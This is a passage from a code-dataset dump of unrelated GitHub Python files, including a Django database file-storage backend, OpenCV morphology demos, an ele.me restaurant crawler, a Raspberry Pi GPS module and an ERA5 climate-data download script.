= '/home/hezhicheng/data/ne_clean/cora/labels.txt'\n graph = MyGraph(path)\n\n print(graph.statistic())\n\n\n\n\n","repo_name":"NKU-IIPLab/Net2Net-NE","sub_path":"Net2Net-NE/basic/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"3955551738","text":"\"\"\"Custom Django FILE_STORAGE that saves files in the database.\"\"\"\n\n# python\nimport base64\nimport os\n# third party\nfrom django.apps import apps\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import Storage\nfrom django.db.models import BinaryField\nfrom django.utils.crypto import get_random_string\nfrom django.utils.http import urlencode\nfrom django.utils.deconstruct import deconstructible\n# project\nfrom .compat import reverse\n\n\nNAME_FORMAT_HINT = './/' \\\n '//'\n\n\nclass NameException(Exception):\n pass\n\n\n@deconstructible\nclass DatabaseFileStorage(Storage):\n \"\"\"File storage system that saves models' FileFields in the database.\n\n Intended for use with Models' FileFields.\n Uses a specific model for each FileField of each Model.\n \"\"\"\n\n def _get_model_cls(self, model_class_path):\n app_label, model_name = model_class_path.rsplit('.', 1)\n return apps.get_model(app_label, model_name)\n\n def _get_encoded_bytes_from_file(self, content_field, _file):\n _file.seek(0)\n file_content = _file.read()\n encoded = base64.b64encode(file_content)\n if isinstance(content_field, BinaryField):\n return encoded\n return encoded.decode('utf-8')\n\n def _get_file_from_encoded_bytes(self, encoded_bytes):\n file_buffer = base64.b64decode(encoded_bytes)\n return ContentFile(file_buffer)\n\n def _get_unique_filename(self, model_cls, filename_field, filename):\n final_name = filename\n\n if ('.' in filename.rsplit(os.sep, 1)[-1]):\n stem, extension = final_name.rsplit('.', 1)\n else:\n stem, extension = (final_name, '')\n\n random_str = get_random_string(7)\n while model_cls.objects.filter(\n **{filename_field: final_name}\n ).exists(): # pragma: no cover\n final_name = '%s_(%s)%s' % (\n stem, random_str,\n ('.%s' % extension) if extension else ''\n )\n random_str = get_random_string(7)\n return final_name\n\n def _get_storage_attributes(self, name):\n try:\n (\n model_class_path,\n content_field,\n filename_field,\n mimetype_field,\n filename\n ) = name.split(os.sep)\n except ValueError:\n raise NameException(\n 'Wrong name format. Got {} ; should be {}'.format(\n name, NAME_FORMAT_HINT)\n )\n return {\n 'model_class_path': model_class_path,\n 'content_field': content_field,\n 'filename_field': filename_field,\n 'mimetype_field': mimetype_field,\n 'filename': filename,\n }\n\n def _open(self, name, mode='rb'):\n assert mode[0] in 'rwab'\n\n if os.sep != '/': # Windows fix (see a6d4707) # pragma: no cover\n name = name.replace('/', os.sep)\n\n storage_attrs = self._get_storage_attributes(name)\n model_class_path = storage_attrs['model_class_path']\n content_field = storage_attrs['content_field']\n filename_field = storage_attrs['filename_field']\n mimetype_field = storage_attrs['mimetype_field']\n filename = storage_attrs['filename']\n\n model_cls = self._get_model_cls(model_class_path)\n model_instance = model_cls.objects.only(\n content_field, mimetype_field\n ).get(**{filename_field: name})\n encoded_bytes = getattr(model_instance, content_field)\n\n _file = self._get_file_from_encoded_bytes(encoded_bytes)\n _file.filename = filename\n _file.mimetype = getattr(model_instance, mimetype_field)\n return _file\n\n def _save(self, name, content):\n storage_attrs = self._get_storage_attributes(name)\n model_class_path = storage_attrs['model_class_path']\n content_field_name = storage_attrs['content_field']\n filename_field_name = storage_attrs['filename_field']\n mimetype_field_name = storage_attrs['mimetype_field']\n\n model_cls = self._get_model_cls(model_class_path)\n new_filename = self._get_unique_filename(model_cls, filename_field_name, name)\n\n content_field = model_cls._meta.get_field(content_field_name)\n encoded_bytes = self._get_encoded_bytes_from_file(content_field, content)\n\n mimetype = (\n getattr(content, 'content_type', None) or # Django >= 1.11\n getattr(content.file, 'content_type', None) or # Django < 1.11\n 'text/plain' # Fallback\n )\n\n model_cls.objects.create(**{\n content_field_name: encoded_bytes,\n filename_field_name: new_filename,\n mimetype_field_name: mimetype,\n })\n return new_filename\n\n def delete(self, name):\n if os.sep != '/': # Windows fix (see a6d4707) # pragma: no cover\n name = name.replace('/', os.sep)\n storage_attrs = self._get_storage_attributes(name)\n model_class_path = storage_attrs['model_class_path']\n filename_field = storage_attrs['filename_field']\n\n model_cls = self._get_model_cls(model_class_path)\n model_cls.objects.filter(**{filename_field: name}).delete()\n\n def exists(self, name):\n if os.sep != '/': # Windows fix (see a6d4707) # pragma: no cover\n name = name.replace('/', os.sep)\n try:\n storage_attrs = self._get_storage_attributes(name)\n except NameException:\n return False\n model_class_path = storage_attrs['model_class_path']\n filename_field = storage_attrs['filename_field']\n\n model_cls = self._get_model_cls(model_class_path)\n return model_cls.objects.filter(\n **{filename_field: name}\n ).exists()\n\n def url(self, name):\n _url = reverse('db_file_storage.download_file')\n return _url + '?' + urlencode({'name': name})\n\n\nclass FixedModelDatabaseFileStorage(DatabaseFileStorage):\n \"\"\"File storage system that saves files in the database.\n\n Intended for use without Models' FileFields, e.g. with Form Wizards.\n Uses a fixed Model to store the all the saved files.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n try:\n self.model_class_path = kwargs.pop('model_class_path')\n self.content_field = kwargs.pop('content_field')\n self.filename_field = kwargs.pop('filename_field')\n self.mimetype_field = kwargs.pop('mimetype_field')\n except KeyError:\n raise KeyError(\n \"keyword args 'model_class_path', 'content_field', \"\n \"'filename_field' and 'mimetype_field' are required.\"\n )\n super(FixedModelDatabaseFileStorage, self).__init__(*args, **kwargs)\n\n def _get_storage_attributes(self, name):\n return {\n 'model_class_path': self.model_class_path,\n 'content_field': self.content_field,\n 'filename_field': self.filename_field,\n 'mimetype_field': self.mimetype_field,\n 'filename': name,\n }\n","repo_name":"victor-o-silva/db_file_storage","sub_path":"db_file_storage/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"37"} +{"seq_id":"16276222423","text":"\n#腐蚀操作中,需要定义卷积和大小和迭代的次数,如果迭代多,核越大 腐蚀越严重\nimport cv2\nimport numpy as np\n# img=np.zeros((5,5),np.uint8)\n# img[1:4,1:4]=1\n# kernel=np.ones((3,1),np.uint8)\n# erosion=cv2.erode(img,kernel)\n# print(\"img=\\n\",img)\n# print(\"kernel=\\n\",kernel)\n# print(\"erosion=\\n\",erosion)\n\no=cv2.imread(\"erode.bmp\",cv2.IMREAD_UNCHANGED)\n\nkernel=np.ones((5,5),np.uint8)\n\nerosion=cv2.erode(o,kernel)\n\ncv2.imshow(\"orriginal\",o)\n\ncv2.imshow(\"erosion\",erosion)\n\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n\n#膨胀的操作和腐蚀刚好相反。\nimg=np.zeros((5,5),np.uint8)\nimg[2:3,1:4]=1\nkernel=np.ones((3,1),np.uint8)\ndilation=cv2.dilate(img,kernel)\nprint(\"img=\\n\",img)\nprint(\"kernel=\\n\",kernel)\nprint(\"dilation\\n\",dilation)\n\n\n##\nimport cv2\n\nimport numpy as np\n\no=cv2.imread(\"dilation.bmp\",cv2.IMREAD_UNCHANGED)\n\nkernel=np.ones((9,9),np.uint8)\n\ndilation=cv2.dilate(o,kernel)\n\ncv2.imshow(\"original\",o)\n\ncv2.imshow(\"dilation\",dilation)\n\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n","repo_name":"LiZheng1997/OpenCV_Practice","sub_path":"Chapters/Chapter8/demo_erode.py","file_name":"demo_erode.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"44268564327","text":"# coding=utf-8\n\nimport requests\nfrom geohash2 import geohash\n\nfrom pear.utils.const import SOURCE, HOT_CITIES\nfrom pear.utils.logger import logger\nfrom pear.utils.mem_cache import mem_cache\nfrom pear.web.controllers.comm import save_ele_restaurants\n\n\ndef get_ele_msg_code(mobile_phone, captcha_value='', captch_hash=''):\n url = 'https://h5.ele.me/restapi/eus/login/mobile_send_code'\n payload = {\n 'mobile': mobile_phone,\n 'captcha_value': captcha_value,\n 'captcha_hash': captch_hash\n }\n headers = {\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36',\n 'origin': 'https://h5.ele.me',\n 'referer': 'https://h5.ele.me/login/'\n }\n token = ''\n try:\n resp = requests.post(url, json=payload, headers=headers, timeout=5)\n data = resp.json()\n if resp.status_code == 200:\n token = data.get('validate_token', '')\n return True, token, ''\n msg = data.get('message')\n return False, token, msg\n except Exception as e:\n msg = e.message.__str__()\n return False, token, msg\n\n\ndef get_ele_captchas(mobile_phone):\n url = 'https://www.ele.me/restapi/eus/v3/captchas'\n payload = {\n 'captcha_str': mobile_phone\n }\n headers = {\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36',\n 'origin': 'https://h5.ele.me',\n 'referer': 'https://h5.ele.me/login/'\n }\n try:\n resp = requests.post(url, json=payload, headers=headers, timeout=5)\n if resp.status_code == 200:\n data = resp.json()\n return True, data.get('captcha_image'), data.get('captcha_hash')\n logger.error(u'get_ele_pic_failed: {}'.format(resp.content))\n except Exception as e:\n logger.error(e, exc_info=True)\n finally:\n return False, None, None\n\n\ndef login_ele_by_mobile(mobile_phone, sms_code, sms_token):\n url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'\n payload = {\n \"mobile\": mobile_phone,\n \"validate_code\": sms_code,\n \"validate_token\": sms_token\n }\n headers = {\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36',\n 'origin': 'https://h5.ele.me',\n 'referer': 'https://h5.ele.me/login/'\n }\n try:\n resp = requests.post(url, json=payload, headers=headers, timeout=5)\n if resp.status_code == 200:\n return True, resp.cookies, resp.text\n return False, resp.cookies, resp.text\n except Exception as e:\n logger.error(e, exc_info=True)\n\n\n@mem_cache()\ndef get_ele_city_list():\n url = 'https://www.ele.me/restapi/shopping/v1/cities'\n try:\n resp = requests.get(url, timeout=5)\n if resp.status_code == 200:\n data = resp.json()\n cities = []\n for k, v in data.iteritems():\n item = [i for i in data[k] if i['name'] in HOT_CITIES]\n cities.extend(item)\n return cities\n except Exception as e:\n logger.error(e, exc_info=True)\n\n\n@mem_cache()\ndef search_ele_address(key, latitude, longitude):\n url = 'https://www.ele.me/restapi/v2/pois'\n _geohash = geohash.encode(latitude=float(\n latitude), longitude=float(longitude))\n logger.info('geohash: {}'.format(_geohash))\n params = {\n 'extras[]': 'count',\n 'geohash': _geohash,\n 'keyword': key,\n 'limit': 20,\n 'type': 'nearby'\n }\n try:\n resp = requests.get(url, timeout=5, params=params)\n if resp.status_code == 200:\n data = resp.json()\n return data\n except Exception as e:\n logger.error(e, exc_info=True)\n\n\ndef get_ele_restaurants(geohash, latitude, longitude, cookies, offset=0, limit=24):\n url = 'https://www.ele.me/restapi/shopping/restaurants'\n params = {\n 'geohash': geohash,\n 'latitude': latitude,\n 'longitude': longitude,\n 'offset': offset,\n 'limit': limit,\n 'extras[]': 'activities'\n }\n try:\n resp = requests.get(url, timeout=5, params=params, cookies=cookies)\n logger.info(resp.headers)\n if resp.status_code == 200:\n data = resp.json()\n for item in data:\n image_path = item['image_path']\n save_ele_restaurants.put(\n source=SOURCE.ELE,\n restaurant_id=item['id'],\n name=item['name'],\n sales=item['recent_order_num'],\n arrive_time=item['order_lead_time'],\n send_fee=item['float_delivery_fee'],\n score=item['rating'],\n latitude=item['latitude'],\n longitude=item['longitude'],\n image='https://fuss10.elemecdn.com/{}/{}/{}.{}'.format(image_path[0:1], image_path[1:3],\n image_path[3:],\n image_path[32:])\n )\n return data\n except Exception as e:\n logger.error(e, exc_info=True)\n","repo_name":"mywenchang/RestaurantCrawler-Pear","sub_path":"pear/web/controllers/ele_crawler_controller.py","file_name":"ele_crawler_controller.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"14581164649","text":"\"\"\"weather_prediction URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n#from django.contrib import admin\n# from django.conf.urls import url\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(r'home/', views.home, name='home'),\n\n # Weather prediction Starts from here\n path(r'weather_predict/', views.weather_prediction, name='weather_predict'),\n path(r'weather_predict/result/', views.weather_result, ),\n # Weather prediction End here \n\n # About us start\n path(r'about/', views.about, name='about')\n]\n","repo_name":"parthapaulpartha/Weather","sub_path":"weather_prediction/weather_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38823302241","text":"#! /usr/bin/env python3\n\n# This next line will abort in any version earlier than Python 3.6:\nf'This script requires Python 3.6 or newer.'\n\nimport time\nimport subprocess\nimport contextlib\nimport os\nimport tempfile\nimport getopt\nimport re\nimport logging\nimport datetime\nimport sys\n\ntry:\n import cdsapi\nexcept ImportError as ie:\n sys.stderr.write(\"\"\"You are missing the cdsapi module!\nYou must install it to run this script.\n\n pip install cdsapi --user\n\nYou will also need to register on the cdsapi website, sign the ERA5\nlicense agreement, get a key, and put the key in your ~/.cdsapi file.\n\"\"\")\n\nimport produtil.setup, produtil.fileop, produtil.locking\n\n# Constants\nUTILITY_NAME = 'hafs_era5_download'\nVERSION_STRING = '0.0.1'\nLOGGING_DOMAIN = UTILITY_NAME\nDATASET = 'reanalysis-era5-single-levels'\nPRODUCT_TYPE = 'reanalysis'\nVARIABLES = [\n '10m_u_component_of_wind', '10m_v_component_of_wind', '2m_dewpoint_temperature',\n '2m_temperature', 'convective_precipitation', 'convective_snowfall',\n 'large_scale_precipitation', 'large_scale_snowfall', 'mean_sea_level_pressure',\n 'near_ir_albedo_for_diffuse_radiation', 'near_ir_albedo_for_direct_radiation',\n 'uv_visible_albedo_for_diffuse_radiation', 'uv_visible_albedo_for_direct_radiation',\n 'surface_latent_heat_flux', 'surface_sensible_heat_flux',\n 'surface_solar_radiation_downwards', 'surface_thermal_radiation_downwards',\n 'surface_pressure', 'total_precipitation', 'skin_temperature',\n 'eastward_turbulent_surface_stress', 'northward_turbulent_surface_stress',\n 'surface_net_solar_radiation', 'surface_net_thermal_radiation'\n]\nFILE_FORMAT = 'netcdf'\nCYCLING_INTERVAL = datetime.timedelta(seconds=3600*24)\nEPSILON = datetime.timedelta(seconds=5) # epsilon for time comparison: five seconds\n\n# Non-constant globals:\ndayset=set() # list of YYYYMMDD strings\nhappy=True # False = something failed\nfilename_format = 'ERA5_%Y%m%d'\nswap_latitudes=True\n\ndef usage(why=None):\n print(f'''Synopsis: {UTILITY_NAME} [options] day [day [...]]\n\nDownloads the listed days of data. Days can be specified as:\n 20210815 = specify one day: August 15, 2021\n 20210815-20210819 = specify a range of days: August 15th to 19th, 2021\n 2018 = specify an entire year (2018)\n\nOptions:\n -q | --quiet = log only warnings and errors\n -v | --verbose = log all messages\n -n | --no-invertlat = do not run \"cdo invertlat\" on downloaded files\n -F format | --format format = filename format as in strftime(3)\n -i | --invertlat = DO run \"cdo inverlat\". This is the default\n --version = print {UTILITY_NAME} {VERSION_STRING}\n --help = this message\n\nFormat example: ERA5_%Y%m%d = ERA5_20210815\nScript will automatically append \".nc\"\n''')\n if why:\n sys.stderr.write(f'SCRIPT IS ABORTING BECAUSE: {why}\\n')\n return 1\n return 0\n\n# Function that makes the singleton for cdsapi client:\n_client = None\ndef client():\n global _client\n if not _client:\n logger.info('creating cdsapi client')\n _client=cdsapi.Client()\n return _client\n\n# Tell CDO to flip latitudes in a NetCDF file:\ndef cdo_swap_latitudes(filename_in,filename_out):\n logger.info('Flip latitudes in \"'+str(filename_in)+'\" and write to \"'+str(filename_out)+'\"')\n cmd = [ 'cdo', 'invertlat', filename_in, filename_out ]\n logger.info(f'''Run \"{'\" \"'.join(cmd) }\"''')\n result = subprocess.run(cmd)\n result.check_returncode()\n\ndef quiet_remove(filename):\n with contextlib.suppress(FileNotFoundError):\n os.remove(filename)\n\n# The meat of the program: retrieve a file\ndef request(when):\n filename_base = when.strftime(filename_format)\n filename_download = filename_base+'_download.nc'\n filename_invert = filename_base+'_invert.nc'\n filename_lock = filename_base+'.lock'\n filename_final = filename_base+'.nc'\n if os.path.exists(filename_final):\n logger.info(filename_final+': already exists. Skipping.')\n return\n with produtil.locking.LockFile(filename_lock,logger):\n try:\n if os.path.exists(filename_final):\n logger.info(filename_final+': already exists (after lock). Skipping.')\n return\n quiet_remove(filename_download)\n quiet_remove(filename_invert)\n logger.info(filename_download+': retrieve '+str(when)+'...')\n request = {\n 'product_type': PRODUCT_TYPE,\n 'variable': VARIABLES,\n 'year': '%04d'%int(when.year),\n 'month': [ '%02d'%int(when.month) ],\n 'day': [ '%02d'%int(when.day) ],\n 'time': [ '%02d'%hour for hour in range(24) ],\n 'format': FILE_FORMAT,\n }\n # super-wordy debugging: logger.debug(filename_download+': request is '+str(request))\n client().retrieve(DATASET,request,filename_download)\n filename_copy=filename_download\n if swap_latitudes:\n cdo_swap_latitudes(filename_download,filename_invert)\n filename_copy=filename_invert\n produtil.fileop.deliver_file(filename_copy,filename_final,logger=logger,\n keep=False,verify=False,moveok=True,force=True)\n quiet_remove(filename_download)\n quiet_remove(filename_invert)\n quiet_remove(filename_lock)\n except Exception as e:\n quiet_remove(filename_download)\n quiet_remove(filename_invert)\n raise e\n\n# Parse arguments and initialize logging:\nlog_level = logging.INFO\noptlist,args = getopt.getopt(sys.argv[1:],'qveniF:',[\n 'version','help','verbose','quiet','invertlat','no-invertlat','format'])\nif len(args)<1:\n exit(usage(\"No arguments provided!\"))\nfor optarg in optlist:\n if optarg[0] in ['-q', '--quiet']:\n log_level = logging.WARNING\n elif optarg[0] in ['-v', '--verbose']:\n log_level = logging.DEBUG\n elif optarg[0] in ['-i', '--invertlat']:\n invertlat = True\n elif optarg[0] in ['-n', '--no-invertlat']:\n invertlat = False\n elif optarg[0] in ['-F', '--format']:\n filename_format = optarg[1]\n elif optarg[0]=='--help':\n exit(usage())\n elif optarg[0]=='--version':\n print(UTILITY_NAME+' '+VERSION_STRING)\n exit(0)\nlogger = logging.getLogger(LOGGING_DOMAIN)\n\nprodutil.setup.setup(level=log_level,send_dbn=False)\n\n# Parse the days. This loop was modified from run_hafs.py:\nfor arg in args:\n if re.match('\\A\\d{8}\\Z',arg):\n logger.info('single date/time')\n # Single date/time\n dayset.add(arg)\n elif re.match('\\A\\d{4}\\Z',arg):\n logger.info('year')\n # Year\n start=datetime.datetime(int(arg,10),1,1,0,0,0)\n end=datetime.datetime(int(arg,10),12,31,23,59,0)\n now=start\n while now=len(daylist):\n logger.info(f'{day}: sleep for a little while... 30 second snooze...')\n time.sleep(30)\n logger.info(f'{day}: done sleeping.')\n iloop=0\n except Exception as ex: # Unfortunately, cdsapi raises Exception\n happy = False\n logger.error(f'CDSAPI failed to download day {day}: {ex}',exc_info=ex)\n\n# Exit 0 on success, 1 on failure:\nexit( 0 if happy else 1 )\n","repo_name":"hafs-community/HAFS","sub_path":"ush/cdeps_utils/hafs_era5_download.py","file_name":"hafs_era5_download.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"70597549548","text":"from flask_wizard import response\nfrom urllib.parse import quote\n\nimport json\nimport math\nimport operator\nimport os\n\ndef link_account(session):\n config_path = os.path.join(os.getcwd(),'config.json')\n with open(config_path,\"r\") as jsonFile:\n config = json.load(jsonFile)\n frontend = config[\"frontend\"]\n url = frontend + \"/login?uid=\"+ str(session['user']['id'])\n course_obj = [response.template_element(\n title=\"Login\",\n action=response.actions(type=\"web_url\",url=url),\n buttons=[response.button(type=\"web_url\",url=url,title=\"Authenticate\")]\n )]\n response.send(session,\"linking it up\")\n template = response.template(type=\"generic\",elements=course_obj)\n response.send(session,template)","repo_name":"GanadiniAkshay/Flask-Wizard","sub_path":"actions/link_account.py","file_name":"link_account.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73174933228","text":"import datetime\nimport time\nimport serial\nfrom mat.dds_states import STATE_DDS_BLE_APP_GPS_ERROR_POSITION, \\\n STATE_DDS_NOTIFY_BOAT_NAME, STATE_DDS_NOTIFY_GPS, \\\n STATE_DDS_NOTIFY_GPS_BOOT\nfrom mat.gps import PORT_CTRL, PORT_DATA\nfrom mat.utils import linux_is_rpi, linux_set_datetime\nfrom settings import ctx as cu\nfrom settings.ctx import hook_gps_dummy_measurement\nfrom tzlocal import get_localzone\nfrom mat.ddh_shared import send_ddh_udp_gui as _u, dds_get_json_vessel_name\nfrom dds.logs import lg_gps as lg\n\n\n_g_ts_told_vessel = 0\n_g_ts_cached_gps_valid_for = 0\n_g_cached_gps = None\n_g_ts_gga = 0\n\n\nPERIOD_GPS_CACHE_VALID_SECS = 30\nPERIOD_GPS_TELL_NUM_SATS_SECS = 300\nPERIOD_GPS_TELL_VESSEL_SECS = 30\nPERIOD_GPS_AT_BOOT_SECS = 300\n\n\ndef gps_get_cache():\n return _g_cached_gps\n\n\ndef _coord_decode(coord: str):\n # src: stackoverflow 18442158 latitude format\n\n x = coord.split(\".\")\n head = x[0]\n deg = head[:-2]\n minutes = '{}.{}'.format(head[-2:], x[1])\n decimal = int(deg) + float(minutes) / 60\n return decimal\n\n\ndef _gps_parse_rmc_frame(data: bytes):\n \"\"\" grab a long comma-separated string, parse fields \"\"\"\n\n if b'GPRMC' not in data:\n return\n\n data = data.decode()\n s = '$GPRMC' + data.split('$GPRMC')[1].split('\\r')[0]\n s = s.split(\",\")\n if s[2] == 'V':\n return\n\n _t = s[1][0:2] + \":\" + s[1][2:4] + \":\" + s[1][4:6]\n _day = s[9][0:2] + \"/\" + s[9][2:4] + \"/\" + s[9][4:6]\n\n # lat, direction, lon, direction, speed, course, variation\n lat = _coord_decode(s[3])\n dir_lat = s[4]\n lon = _coord_decode(s[5])\n dir_lon = s[6]\n speed = s[7]\n _course = s[8]\n # variation = s[10]\n\n # GPS date and time are UTC\n fmt = '{} {}'.format(_day, _t)\n gps_time = datetime.datetime.strptime(fmt, '%d/%m/%y %H:%M:%S')\n\n # display\n # print('time {} date {} lat {} lon {}'.format(_t, _day, lat, lon))\n # print('speed {} mag_var {} course {}'.format(speed, variation, _course))\n\n # return some strings\n lat = lat * 1 if dir_lat == 'N' else lat * -1\n lon = lon * 1 if dir_lon == 'E' else lon * -1\n\n # checksum skipping initial '$'\n cs_in = data.split('*')[1][:2]\n cs_calc = 0\n for c in data[1:].split('*')[0]:\n cs_calc ^= ord(c)\n cs_calc = '{:02x}'.format(int(cs_calc))\n if cs_in != cs_calc.upper():\n return None\n\n # everything went ok\n return lat, lon, gps_time, speed\n\n\ndef _gps_parse_gga_frame(data: bytes):\n \"\"\" grab a long comma-separated string, parse fields \"\"\"\n\n if b'GPGGA' not in data:\n return\n\n # $GPGGA, time, lat, N, lon, W, 1, 07, 1.0, 9.0, M, , , , crc\n data = data.decode()\n\n # log satellites but not always\n global _g_ts_gga\n try:\n n = int(data[7])\n now = time.perf_counter()\n if now > _g_ts_gga:\n # todo > tell this to GUI\n lg.a('{} satellites in view'.format(n))\n _g_ts_gga = now + PERIOD_GPS_TELL_NUM_SATS_SECS\n\n except (Exception, ) as ex:\n lg.a('error: parse GGA frame {}'.format(ex))\n\n\ndef gps_connect_shield():\n\n if not cu.cell_shield_en:\n lg.a('CELL shield set False, so no GPS to configure')\n return\n\n if hook_gps_dummy_measurement:\n lg.a('debug: dummy GPS connected, not configuring it')\n return\n\n sp = serial.Serial(PORT_CTRL, baudrate=115200,\n timeout=1, rtscts=True, dsrdtr=True)\n sp.write(b'AT+QGPS=1\\r')\n ans = sp.readlines()\n rv = (b'+CME ERROR: 504\\r\\n' in ans) or b'OK\\r\\n' in ans\n lg.a('gps_connect_shield answer: {}'.format(ans))\n sp.close()\n time.sleep(0.5)\n return rv\n\n\ndef _gps_measure():\n \"\"\"\n returns (lat, lon, dt object, speed) or None\n for a dummy or real GPS measurement\n \"\"\"\n\n # hooks\n if cu.hook_gps_error_measurement_forced:\n _u(STATE_DDS_BLE_APP_GPS_ERROR_POSITION)\n lg.a('debug: HOOK_GPS_ERROR_MEASUREMENT_FORCED')\n return\n\n if cu.hook_gps_dummy_measurement:\n lg.a('debug: HOOK_GPS_DUMMY_MEASUREMENT')\n time.sleep(.5)\n lat = '{:+.6f}'.format(38.000000000)\n lon = '{:+.6f}'.format(-83.0)\n return lat, lon, datetime.datetime.utcnow(), 1\n\n # real GPS measure\n sp = serial.Serial(PORT_DATA, baudrate=115200, timeout=0.2, rtscts=True, dsrdtr=True)\n till = time.perf_counter() + 2\n sp.flushInput()\n\n # todo > see if these 2 hurt\n sp.readall()\n sp.flushInput()\n\n global _g_ts_cached_gps_valid_for\n global _g_cached_gps\n now = time.perf_counter()\n\n while 1:\n if time.perf_counter() > till:\n break\n\n b = sp.readall()\n # _gps_parse_gga_frame(b)\n g = _gps_parse_rmc_frame(b)\n if g:\n g = list(g)\n lat = '{:+.6f}'.format(g[0])\n lon = '{:+.6f}'.format(g[1])\n if g[3] == '':\n g[3] = '0'\n # float, float, datetime UTC, speed\n _u('{}/{},{}'.format(STATE_DDS_NOTIFY_GPS, lat, lon))\n _g_ts_cached_gps_valid_for = now + PERIOD_GPS_CACHE_VALID_SECS\n _g_cached_gps = lat, lon, g[2], float(g[3])\n return g\n\n if _g_ts_cached_gps_valid_for == 0:\n lg.a('failed, and no cache ever yet')\n return\n\n # failed, but we have GPS cache and is valid\n now = time.perf_counter()\n if now < _g_ts_cached_gps_valid_for:\n lat, lon, dt_utc, speed = _g_cached_gps\n _u('{}/{},{}'.format(STATE_DDS_NOTIFY_GPS, lat, lon))\n lg.a('using cached position {}, {}'.format(lat, lon))\n return _g_cached_gps\n\n lg.a('failed, and cache is too old')\n _g_cached_gps = '', '', None, float(0)\n\n # tell GUI\n _u(STATE_DDS_BLE_APP_GPS_ERROR_POSITION)\n\n\ndef gps_measure():\n try:\n return _gps_measure()\n except (Exception, ) as ex:\n lg.a('error: {}'.format(ex))\n\n\ndef gps_clock_sync_if_so(dt_gps_utc):\n\n utc_now = datetime.datetime.utcnow()\n diff_secs = abs((dt_gps_utc - utc_now).total_seconds())\n if diff_secs < 60:\n return\n lg.a('debug: gps_cloc_sync_diff_secs = {}'.format(diff_secs))\n\n # use GPS time to sync local clock\n assert type(dt_gps_utc) is datetime.datetime\n z_my = get_localzone()\n z_utc = datetime.timezone.utc\n dt_my = dt_gps_utc.replace(tzinfo=z_utc).astimezone(tz=z_my)\n t = str(dt_my)[:-6]\n if not linux_is_rpi():\n # will not set date on non-rpi platforms\n return\n return linux_set_datetime(t)\n\n\ndef gps_wait_for_it_at_boot():\n\n # Wikipedia: GPS-Time-To-First-Fix for cold start is typ.\n # 2 to 4 minutes, warm <= 45 secs, hot <= 22 secs\n\n till = time.perf_counter() + PERIOD_GPS_AT_BOOT_SECS\n s = 'wait up to {} seconds for GPS at boot'\n lg.a(s.format(PERIOD_GPS_AT_BOOT_SECS))\n\n while 1:\n t = time.perf_counter()\n if t > till:\n return '', '', None, 0\n\n # todo > do this state at GUI\n t = int(till - time.perf_counter())\n _u('{}/{}'.format(STATE_DDS_NOTIFY_GPS_BOOT, t))\n\n g = gps_measure()\n if g:\n return g\n lg.a('gps_wait_at_boot returned {}'.format(g))\n s = '{} seconds left to wait for GPS at boot'\n lg.a(s.format(t))\n time.sleep(1)\n\n\ndef gps_tell_vessel_name():\n global _g_ts_told_vessel\n now = time.perf_counter()\n if now < _g_ts_told_vessel:\n return\n _g_ts_told_vessel = now + PERIOD_GPS_TELL_VESSEL_SECS\n v = dds_get_json_vessel_name()\n _u('{}/{}'.format(STATE_DDS_NOTIFY_BOAT_NAME, v))\n\n\nif __name__ == '__main__':\n gps_connect_shield()\n while 1:\n m = gps_measure()\n print(m)\n","repo_name":"xhx509/dds","sub_path":"dds/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":7575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22302451875","text":"inventory = {\n'gold' : 500,\n'pouch' : ['flint', 'twine', 'gemstone'],\n'backpack' : ['xylophone', 'dagger', 'bedroll', 'bread loaf']\n}\n\ninventory['poket'] = ['seashell', 'strange','berry','lint'] # CREATE\ninventory[\"backpack\"].remove('dagger') #DELETE\ninventory['gold'] += 50\n\n\nprint(inventory)\n\n","repo_name":"nerissavu/D4E-TC-NGA","sub_path":"Session4/hw/still_exercise1.py","file_name":"still_exercise1.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75036645867","text":"\"\"\"\n This module abstracts some of the ugliness of interfacing with C++\n from Python by providing an easy-to-use interface to the\n Neighborhood Graph Library (NGL) originally developed by Carlos\n Correa.\n\"\"\"\nfrom nglpy import utils\n\nfrom .ngl import nglGraph, 